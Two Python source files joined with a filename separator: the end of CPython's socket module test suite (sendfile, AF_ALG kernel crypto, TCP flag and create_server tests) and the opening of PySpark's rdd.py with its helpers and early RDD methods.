self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(support.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
class CreateServerTest(unittest.TestCase):
def test_address(self):
port = support.find_unused_port()
with socket.create_server(("127.0.0.1", port)) as sock:
self.assertEqual(sock.getsockname()[0], "127.0.0.1")
self.assertEqual(sock.getsockname()[1], port)
if support.IPV6_ENABLED:
with socket.create_server(("::1", port),
family=socket.AF_INET6) as sock:
self.assertEqual(sock.getsockname()[0], "::1")
self.assertEqual(sock.getsockname()[1], port)
def test_family_and_type(self):
with socket.create_server(("127.0.0.1", 0)) as sock:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
if support.IPV6_ENABLED:
with socket.create_server(("::1", 0), family=socket.AF_INET6) as s:
self.assertEqual(s.family, socket.AF_INET6)
self.assertEqual(sock.type, socket.SOCK_STREAM)
def test_reuse_port(self):
if not hasattr(socket, "SO_REUSEPORT"):
with self.assertRaises(ValueError):
socket.create_server(("localhost", 0), reuse_port=True)
else:
with socket.create_server(("localhost", 0)) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertEqual(opt, 0)
with socket.create_server(("localhost", 0), reuse_port=True) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertNotEqual(opt, 0)
@unittest.skipIf(not hasattr(_socket, 'IPPROTO_IPV6') or
not hasattr(_socket, 'IPV6_V6ONLY'),
"IPV6_V6ONLY option not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_ipv6_only_default(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6) as sock:
assert sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dualstack_ipv6_family(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.assertEqual(sock.family, socket.AF_INET6)
class CreateServerFunctionalTest(unittest.TestCase):
timeout = 3
def setUp(self):
self.thread = None
def tearDown(self):
if self.thread is not None:
self.thread.join(self.timeout)
def echo_server(self, sock):
def run(sock):
with sock:
conn, _ = sock.accept()
with conn:
event.wait(self.timeout)
msg = conn.recv(1024)
if not msg:
return
conn.sendall(msg)
event = threading.Event()
sock.settimeout(self.timeout)
self.thread = threading.Thread(target=run, args=(sock, ))
self.thread.start()
event.set()
def echo_client(self, addr, family):
with socket.socket(family=family) as sock:
sock.settimeout(self.timeout)
sock.connect(addr)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
def test_tcp4(self):
port = support.find_unused_port()
with socket.create_server(("", port)) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_tcp6(self):
port = support.find_unused_port()
with socket.create_server(("", port),
family=socket.AF_INET6) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
# --- dual stack tests
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v4(self):
port = support.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v6(self):
port = support.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest,
UDPTimeoutTest, CreateServerTest, CreateServerFunctionalTest]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.append(BasicQIPCRTRTest)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgUDPLITETest,
RecvmsgUDPLITETest,
RecvmsgIntoUDPLITETest,
SendmsgUDPLITE6Test,
RecvmsgUDPLITE6Test,
RecvmsgRFC3542AncillaryUDPLITE6Test,
RecvmsgIntoRFC3542AncillaryUDPLITE6Test,
RecvmsgIntoUDPLITE6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
from py4j.java_collections import ListConverter, MapConverter
__all__ = ["RDD"]
def portable_hash(x):
"""
This function returns consistent hash code for builtin types, especially
for None and tuple with None.
The algorithm is similar to that one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version >= '3.3' and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
class BoundedFloat(float):
"""
Bounded value is generated by approximate job, with confidence and low
bound and high bound.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(port, serializer):
sock = None
# Support for both IPv4 and IPv6.
# On most of IPv6-ready systems, IPv6 will take precedence.
for res in socket.getaddrinfo("localhost", port, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = socket.socket(af, socktype, proto)
try:
sock.settimeout(3)
sock.connect(sa)
except socket.error:
sock.close()
sock = None
continue
break
if not sock:
raise Exception("could not open socket")
try:
rf = sock.makefile("rb", 65536)
for item in serializer.load_stream(rf):
yield item
finally:
sock.close()
def ignore_unicode_prefix(f):
"""
Ignore the 'u' prefix of string in doc tests, to make it works
in both python 2 and 3
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY_SER}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY_SER)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY_SER):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY_SER}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD has been checkpointed or not
"""
return self._jrdd.rdd().isCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(f, iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(f, iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
